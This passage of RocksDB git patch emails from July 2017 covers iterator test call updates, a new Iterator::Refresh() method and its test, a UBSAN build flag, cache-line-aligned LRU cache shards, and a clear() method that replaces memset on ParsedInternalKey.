db_iter->SeekToFirst(); 
ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1309,7 +1309,7 @@ TEST_F(DBIteratorTest, DBIterator3) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 2, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1333,7 +1333,7 @@ TEST_F(DBIteratorTest, DBIterator4) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 4, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1365,7 +1365,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1387,7 +1387,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 1, options.max_sequential_skip_in_iterations, 0)); + 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1409,7 +1409,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1431,7 +1431,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 3, options.max_sequential_skip_in_iterations, 0)); + 3, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1453,7 +1453,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1475,7 +1475,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 5, options.max_sequential_skip_in_iterations, 0)); + 5, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1497,7 +1497,7 @@ TEST_F(DBIteratorTest, DBIterator5) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 6, options.max_sequential_skip_in_iterations, 0)); + 6, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1517,7 +1517,7 @@ TEST_F(DBIteratorTest, DBIterator5) { internal_iter->Finish(); std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 10, 
options.max_sequential_skip_in_iterations, 0)); + 10, options.max_sequential_skip_in_iterations)); db_iter->Seek("b"); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -1546,7 +1546,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1568,7 +1568,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 1, options.max_sequential_skip_in_iterations, 0)); + 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1590,7 +1590,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1612,7 +1612,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 3, options.max_sequential_skip_in_iterations, 0)); + 3, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(!db_iter->Valid()); } @@ -1630,7 +1630,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1652,7 +1652,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 5, options.max_sequential_skip_in_iterations, 0)); + 5, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1674,7 +1674,7 @@ TEST_F(DBIteratorTest, DBIterator6) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 6, options.max_sequential_skip_in_iterations, 0)); + 6, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1715,7 +1715,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 0, options.max_sequential_skip_in_iterations, 0)); + 0, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -1749,7 +1749,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 2, options.max_sequential_skip_in_iterations, 0)); + 2, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1789,7 +1789,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 4, options.max_sequential_skip_in_iterations, 0)); + 4, 
options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1829,7 +1829,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 5, options.max_sequential_skip_in_iterations, 0)); + 5, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1874,7 +1874,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 6, options.max_sequential_skip_in_iterations, 0)); + 6, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1920,7 +1920,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 7, options.max_sequential_skip_in_iterations, 0)); + 7, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -1960,7 +1960,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 9, options.max_sequential_skip_in_iterations, 0)); + 9, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2006,7 +2006,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 13, options.max_sequential_skip_in_iterations, 0)); + 13, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2053,7 +2053,7 @@ TEST_F(DBIteratorTest, DBIterator7) { std::unique_ptr db_iter( NewDBIterator(env_, ro, cf_options, BytewiseComparator(), internal_iter, - 14, options.max_sequential_skip_in_iterations, 0)); + 14, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2083,7 +2083,7 @@ TEST_F(DBIteratorTest, DBIterator8) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -2113,7 +2113,7 @@ TEST_F(DBIteratorTest, DBIterator9) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 10, options.max_sequential_skip_in_iterations)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); @@ -2179,7 +2179,7 @@ TEST_F(DBIteratorTest, DBIterator10) { std::unique_ptr db_iter(NewDBIterator( env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 10, options.max_sequential_skip_in_iterations)); db_iter->Seek("c"); ASSERT_TRUE(db_iter->Valid()); @@ -2218,7 +2218,7 @@ TEST_F(DBIteratorTest, SeekToLastOccurrenceSeq0) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, 0 /* force seek */, 0)); + internal_iter, 10, 0 /* force seek */)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -2246,7 +2246,7 @@ TEST_F(DBIteratorTest, DBIterator11) { std::unique_ptr db_iter(NewDBIterator( env_, ro, 
ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 1, options.max_sequential_skip_in_iterations, 0)); + internal_iter, 1, options.max_sequential_skip_in_iterations)); db_iter->SeekToFirst(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "a"); @@ -2272,7 +2272,7 @@ TEST_F(DBIteratorTest, DBIterator12) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 10, 0, 0)); + internal_iter, 10, 0)); db_iter->SeekToLast(); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "c"); @@ -2309,7 +2309,7 @@ TEST_F(DBIteratorTest, DBIterator13) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 2, 3, 0)); + internal_iter, 2, 3)); db_iter->Seek("b"); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), key); @@ -2337,7 +2337,7 @@ TEST_F(DBIteratorTest, DBIterator14) { std::unique_ptr db_iter( NewDBIterator(env_, ro, ImmutableCFOptions(options), BytewiseComparator(), - internal_iter, 4, 1, 0)); + internal_iter, 4, 1)); db_iter->Seek("b"); ASSERT_TRUE(db_iter->Valid()); ASSERT_EQ(db_iter->key().ToString(), "b"); @@ -2376,7 +2376,7 @@ class DBIterWithMergeIterTest : public testing::Test { db_iter_.reset(NewDBIterator(env_, ro_, ImmutableCFOptions(options_), BytewiseComparator(), merge_iter, 8 /* read data earlier than seqId 8 */, - 3 /* max iterators before reseek */, 0)); + 3 /* max iterators before reseek */)); } Env* env_; diff --git a/db/db_iterator_test.cc b/db/db_iterator_test.cc index 90f43ea374d..ea65f3a2603 100644 --- a/db/db_iterator_test.cc +++ b/db/db_iterator_test.cc @@ -1909,6 +1909,65 @@ TEST_F(DBIteratorTest, DBIteratorSkipRecentDuplicatesTest) { NUMBER_OF_RESEEKS_IN_ITERATION)); } +TEST_F(DBIteratorTest, Refresh) { + ASSERT_OK(Put("x", "y")); + + std::unique_ptr iter(db_->NewIterator(ReadOptions())); + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + ASSERT_OK(Put("c", "d")); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + iter->Refresh(); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("c")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + dbfull()->Flush(FlushOptions()); + + ASSERT_OK(Put("m", "n")); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("c")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + iter->Refresh(); + + iter->Seek(Slice("a")); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("c")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("m")), 0); + iter->Next(); + ASSERT_TRUE(iter->Valid()); + ASSERT_EQ(iter->key().compare(Slice("x")), 0); + iter->Next(); + ASSERT_FALSE(iter->Valid()); + + iter.reset(); +} + } // namespace rocksdb int main(int argc, char** argv) { diff --git a/include/rocksdb/iterator.h b/include/rocksdb/iterator.h index 4e09f64e9a6..d4ac5281816 100644 --- a/include/rocksdb/iterator.h +++ b/include/rocksdb/iterator.h @@ -80,6 +80,13 @@ class Iterator : public Cleanable { // satisfied without doing 
some IO, then this returns Status::Incomplete(). virtual Status status() const = 0; + // If supported, renew the iterator to represent the latest state. The + // iterator will be invalidated after the call. Not supported if + // ReadOptions.snapshot is given when creating the iterator. + virtual Status Refresh() { + return Status::NotSupported("Refresh() is not supported"); + } + // Property "rocksdb.iterator.is-key-pinned": // If returning "1", this means that the Slice returned by key() is valid // as long as the iterator is not deleted. diff --git a/utilities/date_tiered/date_tiered_db_impl.cc b/utilities/date_tiered/date_tiered_db_impl.cc index b75c077be47..c1b1ceb5ecb 100644 --- a/utilities/date_tiered/date_tiered_db_impl.cc +++ b/utilities/date_tiered/date_tiered_db_impl.cc @@ -378,8 +378,8 @@ Iterator* DateTieredDBImpl::NewIterator(const ReadOptions& opts) { DBImpl* db_impl = reinterpret_cast(db_); auto db_iter = NewArenaWrappedDbIterator( - db_impl->GetEnv(), opts, ioptions_, cf_options_.comparator, - kMaxSequenceNumber, cf_options_.max_sequential_skip_in_iterations, 0); + db_impl->GetEnv(), opts, ioptions_, kMaxSequenceNumber, + cf_options_.max_sequential_skip_in_iterations, 0); auto arena = db_iter->GetArena(); MergeIteratorBuilder builder(cf_options_.comparator, arena); From 216644c61ca4f1176f98bd4ce1c6b4ad9d7c893b Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Mon, 24 Jul 2017 10:41:09 -0700 Subject: [PATCH 029/205] enable UBSAN macro in TARGETS Summary: Simply enable the macro in the internal build; it won't hurt other sanitizers and will fix UBSAN issues. Closes https://github.com/facebook/rocksdb/pull/2625 Differential Revision: D5475897 Pulled By: IslamAbdelRahman fbshipit-source-id: 262c6fd5de3c1906f4b29e55b39110f125f41057 --- TARGETS | 1 + buckifier/targets_cfg.py | 1 + 2 files changed, 2 insertions(+) diff --git a/TARGETS b/TARGETS index 134bb5081d3..c6c0de48bc0 100644 --- a/TARGETS +++ b/TARGETS @@ -18,6 +18,7 @@ rocksdb_compiler_flags = [ "-DROCKSDB_SUPPORT_THREAD_LOCAL", "-DHAVE_SSE42", "-DOS_LINUX", + "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include "-DSNAPPY", "-DZLIB", diff --git a/buckifier/targets_cfg.py b/buckifier/targets_cfg.py index 079b892a75d..836493951ae 100644 --- a/buckifier/targets_cfg.py +++ b/buckifier/targets_cfg.py @@ -22,6 +22,7 @@ "-DROCKSDB_SUPPORT_THREAD_LOCAL", "-DHAVE_SSE42", "-DOS_LINUX", + "-DROCKSDB_UBSAN_RUN", # Flags to enable libs we include "-DSNAPPY", "-DZLIB", From 16e03882054fa8c947ca84f30b87e1cd3e929597 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Mon, 24 Jul 2017 10:46:21 -0700 Subject: [PATCH 030/205] LRUCacheShard cache line size alignment Summary: Combining #2568 and #2612.
Closes https://github.com/facebook/rocksdb/pull/2620 Differential Revision: D5464394 Pulled By: IslamAbdelRahman fbshipit-source-id: 9f71d3058dd6adaf02ce3b2de3a81a1228009778 --- cache/lru_cache.cc | 19 +++++++++++++++++-- cache/lru_cache.h | 42 ++++++++++++++++++++++++++++------------- cache/lru_cache_test.cc | 11 ++++++++++- port/port_posix.cc | 17 +++++++++++++++++ port/port_posix.h | 7 +++++++ port/win/port_win.h | 18 ++++++++++++++++++ 6 files changed, 98 insertions(+), 16 deletions(-) diff --git a/cache/lru_cache.cc b/cache/lru_cache.cc index 2a4c0f77a08..f833374e73c 100644 --- a/cache/lru_cache.cc +++ b/cache/lru_cache.cc @@ -22,7 +22,7 @@ namespace rocksdb { -LRUHandleTable::LRUHandleTable() : length_(0), elems_(0), list_(nullptr) { +LRUHandleTable::LRUHandleTable() : list_(nullptr), length_(0), elems_(0) { Resize(); } @@ -100,7 +100,7 @@ void LRUHandleTable::Resize() { } LRUCacheShard::LRUCacheShard() - : usage_(0), lru_usage_(0), high_pri_pool_usage_(0) { + : high_pri_pool_usage_(0), usage_(0), lru_usage_(0) { // Make empty circular linked list lru_.next = &lru_; lru_.prev = &lru_; @@ -233,6 +233,14 @@ void LRUCacheShard::EvictFromLRU(size_t charge, } } +void* LRUCacheShard::operator new(size_t size) { + return rocksdb::port::cacheline_aligned_alloc(size); +} + +void LRUCacheShard::operator delete(void *memblock) { + rocksdb::port::cacheline_aligned_free(memblock); +} + void LRUCacheShard::SetCapacity(size_t capacity) { autovector last_reference_list; { @@ -449,7 +457,14 @@ LRUCache::LRUCache(size_t capacity, int num_shard_bits, bool strict_capacity_limit, double high_pri_pool_ratio) : ShardedCache(capacity, num_shard_bits, strict_capacity_limit) { num_shards_ = 1 << num_shard_bits; +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable: 4316) // We've validated the alignment with the new operators +#endif shards_ = new LRUCacheShard[num_shards_]; +#if defined(_MSC_VER) +#pragma warning(pop) +#endif SetCapacity(capacity); SetStrictCapacityLimit(strict_capacity_limit); for (int i = 0; i < num_shards_; i++) { diff --git a/cache/lru_cache.h b/cache/lru_cache.h index 5fbe0f26459..2fd44bbce50 100644 --- a/cache/lru_cache.h +++ b/cache/lru_cache.h @@ -148,13 +148,13 @@ class LRUHandleTable { // The table consists of an array of buckets where each bucket is // a linked list of cache entries that hash into the bucket. + LRUHandle** list_; uint32_t length_; uint32_t elems_; - LRUHandle** list_; }; // A single shard of sharded cache. -class LRUCacheShard : public CacheShard { +class ALIGN_AS(CACHE_LINE_SIZE) LRUCacheShard : public CacheShard { public: LRUCacheShard(); virtual ~LRUCacheShard(); @@ -202,6 +202,11 @@ class LRUCacheShard : public CacheShard { // not threadsafe size_t TEST_GetLRUSize(); + // Overloaded to align it to the cache line size + void* operator new(size_t); + + void operator delete(void *); + private: void LRU_Remove(LRUHandle* e); void LRU_Insert(LRUHandle* e); @@ -223,12 +228,6 @@ class LRUCacheShard : public CacheShard { // Initialized before use. size_t capacity_; - // Memory size for entries residing in the cache - size_t usage_; - - // Memory size for entries residing only in the LRU list - size_t lru_usage_; - // Memory size for entries in high-pri pool. size_t high_pri_pool_usage_; @@ -242,11 +241,6 @@ class LRUCacheShard : public CacheShard { // Remember the value to avoid recomputing each time. double high_pri_pool_capacity_; - // mutex_ protects the following state.
- // We don't count mutex_ as the cache's internal state so semantically we - // don't mind mutex_ invoking the non-const actions. - mutable port::Mutex mutex_; - // Dummy head of LRU list. // lru.prev is newest entry, lru.next is oldest entry. // LRU contains items which can be evicted, ie reference only by cache @@ -255,7 +249,29 @@ class LRUCacheShard : public CacheShard { // Pointer to head of low-pri pool in LRU list. LRUHandle* lru_low_pri_; + // ------------^^^^^^^^^^^^^----------- + // Not frequently modified data members + // ------------------------------------ + // + // We separate data members that are updated frequently from the ones that + // are not frequently updated so that they don't share the same cache line, + // which would lead to false sharing + // + // ------------------------------------ + // Frequently modified data members + // ------------vvvvvvvvvvvvv----------- LRUHandleTable table_; + + // Memory size for entries residing in the cache + size_t usage_; + + // Memory size for entries residing only in the LRU list + size_t lru_usage_; + + // mutex_ protects the following state. + // We don't count mutex_ as the cache's internal state so semantically we + // don't mind mutex_ invoking the non-const actions. + mutable port::Mutex mutex_; }; class LRUCache : public ShardedCache { diff --git a/cache/lru_cache_test.cc b/cache/lru_cache_test.cc index 87794fd1617..1b83033c36c 100644 --- a/cache/lru_cache_test.cc +++ b/cache/lru_cache_test.cc @@ -17,7 +17,16 @@ class LRUCacheTest : public testing::Test { ~LRUCacheTest() {} void NewCache(size_t capacity, double high_pri_pool_ratio = 0.0) { - cache_.reset(new LRUCacheShard()); + cache_.reset( +#if defined(_MSC_VER) +#pragma warning(push) +#pragma warning(disable: 4316) // We've validated the alignment with the new operators +#endif + new LRUCacheShard() +#if defined(_MSC_VER) +#pragma warning(pop) +#endif + ); cache_->SetCapacity(capacity); cache_->SetStrictCapacityLimit(false); cache_->SetHighPriorityPoolRatio(high_pri_pool_ratio); diff --git a/port/port_posix.cc b/port/port_posix.cc index 59241daff44..ee073a55d3f 100644 --- a/port/port_posix.cc +++ b/port/port_posix.cc @@ -184,5 +184,22 @@ int GetMaxOpenFiles() { return -1; } +void *cacheline_aligned_alloc(size_t size) { +#if defined (_ISOC11_SOURCE) + return aligned_alloc(CACHE_LINE_SIZE, size); +#elif ( _POSIX_C_SOURCE >= 200112L || _XOPEN_SOURCE >= 600 || defined(__APPLE__)) + void *m; + errno = posix_memalign(&m, CACHE_LINE_SIZE, size); + return errno ?
NULL : m; +#else + return malloc(size); +#endif +} + +void cacheline_aligned_free(void *memblock) { + free(memblock); +} + + } // namespace port } // namespace rocksdb diff --git a/port/port_posix.h b/port/port_posix.h index 72beb0409f3..fe0d42644c4 100644 --- a/port/port_posix.h +++ b/port/port_posix.h @@ -193,6 +193,13 @@ extern void InitOnce(OnceType* once, void (*initializer)()); #endif #endif + +extern void *cacheline_aligned_alloc(size_t size); + +extern void cacheline_aligned_free(void *memblock); + +#define ALIGN_AS(n) alignas(n) + #define PREFETCH(addr, rw, locality) __builtin_prefetch(addr, rw, locality) extern void Crash(const std::string& srcfile, int srcline); diff --git a/port/win/port_win.h b/port/win/port_win.h index bbc5feec31b..1ec09068335 100644 --- a/port/win/port_win.h +++ b/port/win/port_win.h @@ -27,6 +27,7 @@ #include #include #include +#include <malloc.h> #include @@ -239,6 +240,23 @@ extern void InitOnce(OnceType* once, void (*initializer)()); #define CACHE_LINE_SIZE 64U #endif + +inline void *cacheline_aligned_alloc(size_t size) { + return _aligned_malloc(size, CACHE_LINE_SIZE); +} + +inline void cacheline_aligned_free(void *memblock) { + _aligned_free(memblock); +} + +// https://gcc.gnu.org/bugzilla/show_bug.cgi?id=52991 for MINGW32 +// could not be worked around by -mno-ms-bitfields +#ifndef __MINGW32__ +#define ALIGN_AS(n) __declspec(align(n)) +#else +#define ALIGN_AS(n) +#endif + static inline void AsmVolatilePause() { #if defined(_M_IX86) || defined(_M_X64) YieldProcessor(); From a4c42e80075f5dcdf21c33bc63b14af981c8a79a Mon Sep 17 00:00:00 2001 From: Islam AbdelRahman Date: Mon, 24 Jul 2017 10:47:19 -0700 Subject: [PATCH 031/205] Fix UBSAN issue of passing nullptr to memcmp Summary: As explained in the comments, sometimes we create Slice(nullptr, 0) in our code base, which causes us to make calls like ``` memcmp(nullptr, "abc", 0); ``` That's fine since the len equals 0, but UBSAN is not happy about it, so disable UBSAN for this function and add an assert instead. Closes https://github.com/facebook/rocksdb/pull/2616 Differential Revision: D5458326 Pulled By: IslamAbdelRahman fbshipit-source-id: cfca32abe30f7d8f760c9f77ecd9543dfb1170dd --- include/rocksdb/slice.h | 10 ++++++++++ 1 file changed, 10 insertions(+) diff --git a/include/rocksdb/slice.h b/include/rocksdb/slice.h index fe8dee00f04..d1786dd44da 100644 --- a/include/rocksdb/slice.h +++ b/include/rocksdb/slice.h @@ -213,8 +213,18 @@ inline bool operator!=(const Slice& x, const Slice& y) { return !(x == y); } +// UBSAN complains that we pass nullptr to memcmp; that's fine since +// we only do that for a string of len = 0 +#ifdef ROCKSDB_UBSAN_RUN +#if defined(__clang__) +__attribute__((__no_sanitize__("undefined"))) +#elif defined(__GNUC__) +__attribute__((__no_sanitize_undefined__)) +#endif +#endif inline int Slice::compare(const Slice& b) const { const size_t min_len = (size_ < b.size_) ? size_ : b.size_; + assert((data_ != nullptr && b.data_ != nullptr) || min_len == 0); int r = memcmp(data_, b.data_, min_len); if (r == 0) { if (size_ < b.size_) r = -1; From 1d8aa2961c46538713f37467ca9f72f87173df44 Mon Sep 17 00:00:00 2001 From: Daniel Black Date: Mon, 24 Jul 2017 11:28:20 -0700 Subject: [PATCH 032/205] Gcc 7 ParsedInternalKey replace memset with clear function. Summary: I haven't looked to see if a class variable inside a loop like this is always initialised.
Closes https://github.com/facebook/rocksdb/pull/2602 Differential Revision: D5475937 Pulled By: IslamAbdelRahman fbshipit-source-id: 8570b308f9a4b49e2a56ccc9e9b84d7c46568c15 --- db/dbformat.h | 6 ++++++ db/write_batch_test.cc | 2 +- java/rocksjni/write_batch_test.cc | 2 +- 3 files changed, 8 insertions(+), 2 deletions(-) diff --git a/db/dbformat.h b/db/dbformat.h index 0ffffc88f22..ed1861cf245 100644 --- a/db/dbformat.h +++ b/db/dbformat.h @@ -84,6 +84,12 @@ struct ParsedInternalKey { ParsedInternalKey(const Slice& u, const SequenceNumber& seq, ValueType t) : user_key(u), sequence(seq), type(t) { } std::string DebugString(bool hex = false) const; + + void clear() { + user_key.clear(); + sequence = 0; + type = kTypeDeletion; + } }; // Return the length of the encoding of "key". diff --git a/db/write_batch_test.cc b/db/write_batch_test.cc index 4fd156d9bae..4584793abe1 100644 --- a/db/write_batch_test.cc +++ b/db/write_batch_test.cc @@ -60,7 +60,7 @@ static std::string PrintContents(WriteBatch* b) { } for (iter->SeekToFirst(); iter->Valid(); iter->Next()) { ParsedInternalKey ikey; - memset((void*)&ikey, 0, sizeof(ikey)); + ikey.clear(); EXPECT_TRUE(ParseInternalKey(iter->key(), &ikey)); switch (ikey.type) { case kTypeValue: diff --git a/java/rocksjni/write_batch_test.cc b/java/rocksjni/write_batch_test.cc index 0654e01588e..199ad239d79 100644 --- a/java/rocksjni/write_batch_test.cc +++ b/java/rocksjni/write_batch_test.cc @@ -59,7 +59,7 @@ jbyteArray Java_org_rocksdb_WriteBatchTest_getContents( rocksdb::ReadOptions(), &arena)); for (iter->SeekToFirst(); iter->Valid(); iter->Next()) { rocksdb::ParsedInternalKey ikey; - memset(reinterpret_cast(&ikey), 0, sizeof(ikey)); + ikey.clear(); bool parsed = rocksdb::ParseInternalKey(iter->key(), &ikey); if (!parsed) { assert(parsed); From 34112aeffde7f8d63450c0647f16382c2f6b8836 Mon Sep 17 00:00:00 2001 From: kapitan-k Date: Mon, 24 Jul 2017 11:47:34 -0700 Subject: [PATCH 033/205] Added db paths to c Summary: Closes https://github.com/facebook/rocksdb/pull/2613 Differential Revision: D5476064 Pulled By: sagar0 fbshipit-source-id: 6b30a9eacb93a945bbe499eafb90565fa9f1798b --- db/c.cc | 26 ++++++++++++++++++++++++++ db/c_test.c | 21 +++++++++++++++++++++ include/rocksdb/c.h | 9 +++++++++ 3 files changed, 56 insertions(+) diff --git a/db/c.cc b/db/c.cc index 441ffade3b6..e1af3836e6b 100644 --- 